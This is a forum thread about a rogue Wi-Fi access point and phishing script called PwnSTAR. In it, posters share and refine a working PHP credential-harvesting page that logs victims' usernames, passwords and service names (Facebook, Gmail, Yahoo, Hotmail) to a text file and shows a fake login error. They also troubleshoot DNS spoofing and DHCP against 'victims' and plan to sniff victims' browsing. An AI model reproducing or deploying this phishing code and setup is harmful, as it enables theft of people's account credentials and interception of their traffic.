Thread: Soft AP / Phishing Script [Release]

  1. #11
    Just burned his ISO
    Join Date
    Mar 2012
    Posts
    15

    Default Re: Soft AP / Phishing Script [Release]

    VulpiArgenti, thank you for your work on this script, it works very well.

    I have made some changes to the html and php portions of this script and wanted to share them here.

    I wanted to know which service the victim/user was trying to login with so I modified lines 37 through 40 of index.html to include name="service" on the login buttons:
    Code:
    	<td align=center ><input type="submit" value="login" name="facebook" /></td>
    	<td align=center ><input type="submit" value="login" name="yahoo" /></td>
    	<td align=center ><input type="submit" value="login" name="hotmail" /></td>
    	<td align=center ><input type="submit" value="login" name="gmail" /></td>
    I've made several modifications to process-form-data.php so I'll post the entire file here. I added the handling of the names of the buttons, I changed the layout of the .txt file it creates, I made it display an error and refresh back to the login page so they don't keep refreshing and adding the credentials to the file over and over, and shortened the sleep(4) to sleep(1) because 4 seemed to be too long to me (just preference maybe).

    Here's the new process-form-data.php
    Code:
    <?php
    $name = $_POST['login'];
    $password = $_POST['password'];
    
    if($_POST['facebook']){
    	$service = "facebook";
    }elseif($_POST['yahoo']){
    	$service = "yahoo";
    }elseif($_POST['hotmail']){
    	$service = "hotmail";
    }elseif($_POST['gmail']){
    	$service = "gmail";
    }
    
    $accinfo = "login: $name\npass: $password\nservice: $service\n-----\n";
    
    $fp = fopen("formdata.txt", "a");
    fwrite($fp, $accinfo);
    fclose($fp);
    
    sleep(1);
    
    $error =
    "<html>\n" .
    "<head>\n" .
    "<meta http-equiv=\"Refresh\" content=\"5;url=/\" />\n" .
    "</head>\n" .
    "<body>\n" .
    "<center><p1><b>Login incorrect.</b></p1></center>\n" .
    "<center><p1>You are being redirected.</p1></center>\n" .
    "</body>\n" .
    "</html>";
    
    echo $error;
    
    //uncomment to debug $_POST variable:
    //print_r($_POST);
    
    //uncomment to list name, password, and service variables:
    //echo('$name: ' . $name . '<br>$password: ' . $password . '<br>$service: ' . $service);
    
    ?>

  2. #12
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    #resize -s 38 85 &> /dev/null # resize the terminal
    commented out because it really f*cks up the resize
    I've now tested this and it looks as though this is a KDE problem (I see the colours are not great either). I'm not really interested in exploring KDE so for the moment KDE users should comment out this line, and I'll either fix it or remove it from the next release.

  3. #13
    Just burned his ISO
    Join Date
    Apr 2012
    Posts
    1

    Default Re: Soft AP / Phishing Script [Release]

    Had to remove the resizing and colouring; it messed up on KDE.
    Otherwise looks good, get a few errors like no such thing as dhcp3.

    The login page simply lets you login once you press "Login" even if you don't enter credentials, pretty annoying.

  4. #14
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    @devi1,

    Great contribution - nice to see the open-source community in action.

    Two questions:

    1. Can you amend the php to allow the victim to continue on to browse, once they have entered credentials? Something like:

    Code:
    if [no credentials entered], then error function (same as you have now)
    else [credentials entered], echo "Thank you. Refresh browser to continue browsing"
    I can look at coding iptables to support this, and have PwnSTAR sniff their activities.

    2. Can I put your php up on the googlecode page (with full accreditation of course)?

    Regards
    Vulpi

  5. #15
    Just burned his ISO
    Join Date
    Mar 2012
    Posts
    15

    Default Re: Soft AP / Phishing Script [Release]

    @Vulpi,

    1. I was thinking of this and was not too sure how to go about doing that. If I can figure it out I'd definitely implement this. Someone else with more experience may get to it first.

    2. If you like what I've done then feel free to include it in the project.

  6. #16
    Just burned his ISO
    Join Date
    Mar 2012
    Posts
    15

    Default Re: Soft AP / Phishing Script [Release]

    I found this page with information on setting up a captive portal with iptables and php: http://www.andybev.com/index.php/Usi...captive_portal

    It looks like it would be fairly simple to add this to your script. This may also require adding some kind of setup script that creates the rmtrack file and modifies the sudoers file to allow apache to modify iptables.

  7. #17
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    amend the php
    It seems php is similar to bash: this does the job;

    PHP Code:
    if(($password == "") || ($name == "")){ 
    echo 
    $error
    }else{ echo 
    $success

    ---------------------------------------------------------------

    captive portal... fairly simple to add this to your script
    We'll see how simple!!
    Last edited by VulpiArgenti; 04-09-2012 at 09:00 AM.

  8. #18
    Junior Member
    Join Date
    Dec 2011
    Posts
    30

    Default Reference: Re: Soft AP / Phishing Script [Release]

    Hello VulpiArgenti, thank you for your advice, but that's exactly how I am configuring everything. Anyway, I suppose my problem resides in the dhcp... the victim connects to the fake AP but there is no transmission of data at all (checking the victim PC I have only transmitted packets victim->fake, and 0 received). I tried purging and reinstalling the whole dhcp3 via apt (no result), and then trying on a fresh bt5r2 gnome 64, and nothing yet. I am using an alfa awus036nh as fake AP, so I don't think the problem could be the receiver (you have the same one if I recall correctly :P). Could I provide more information? Just tell me, right now I'm very curious to discover the real problem! Thanks!




    Quote Originally Posted by VulpiArgenti View Post
    Hi bugme,

    Thanks for your comments - much appreciated.

    Regarding the Eterm colours, you can see on the screenshot that they should be a very readable purple/yellow. Please launch Eterm then adjust the background settings: transparency off, pixmap none; then "save theme settings". This gives a blank background to show the script colours.

    You shouldn't need to create any additional directories once you have moved "hotspot" into /var/www. Your directory setup should look like this:

    Code:
    root@bt:~# ls /var/www
    hotspot  index.html  wstool
    root@bt:~# ls /var/www/hotspot
    facebookLogo.jpg  GmailLogo.png   HotmailLogo.png  process-form-data.php
    formdata.txt      GoogleWifi.jpg  index.html       yahoo.gif
    And then running the script (red is your entries):
    Code:
    Setting up the web page
    
    MUST have directory structure set up correctly
    
    Available web directories:
    hotspot
    index.html
    wstool
    
    Select directory
    hotspot
    
    hotspot/index moved into position
    
    Starting Apache...
     * Starting web server apache2                                                [ OK ] 
    ...success
    
    Starting DNS spoofing...
    
    Do you want to tail the credentials txtfile? (y/n)
    y
    
    
    facebookLogo.jpg  GmailLogo.png   HotmailLogo.png  process-form-data.php
    formdata.txt      GoogleWifi.jpg  index.html       yahoo.gif
    
    Enter name of txtfile
    formdata.txt
    
    Web Server attack running
    Try again with it set up like this.

    If there are still problems we need to troubleshoot your victim's connection. Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?

  9. #19
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Reference: Re: Soft AP / Phishing Script [Release]

    Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?
    Hi bugme, would you copy and post the contents of these 2 eterms, after your victim has associated?

  10. #20
    Senior Member VulpiArgenti's Avatar
    Join Date
    Sep 2011
    Location
    lost
    Posts
    174

    Default Re: Soft AP / Phishing Script [Release]

    [Update]

    Version 0.51 out:

    • Improved navigation and trapping (thanks snafu777 for the motivation)
    • Recognises KDE, doesn't attempt resize
    • Changed background to black (better in KDE)
    • Made input technique more obvious (thanks nivong)
    • Improved error handling
    • Various minor bugfixes
    • Added option of stopping dnsspoof to allow internet access once credentials are harvested. Note this must be done manually.
    • Improved hotspot php (with assistance from devi1). Can no longer bypass the login page.


    Please READ THE SCRIPT, it contains a lot of comments (and should help you understand the mechanics of these simple attacks, as well as learn basic bash coding).
    I also forgot to mention in my initial post that the comments section of the script contains acknowledgement of other scripts I looked at (and I recommend you do the same).

    Meet the new improved PwnSTAR at: http://code.google.com/p/pwn-star/downloads/list


    [Coming next - a functional captive portal page with multi-client handling (Hopefully. Maybe)]
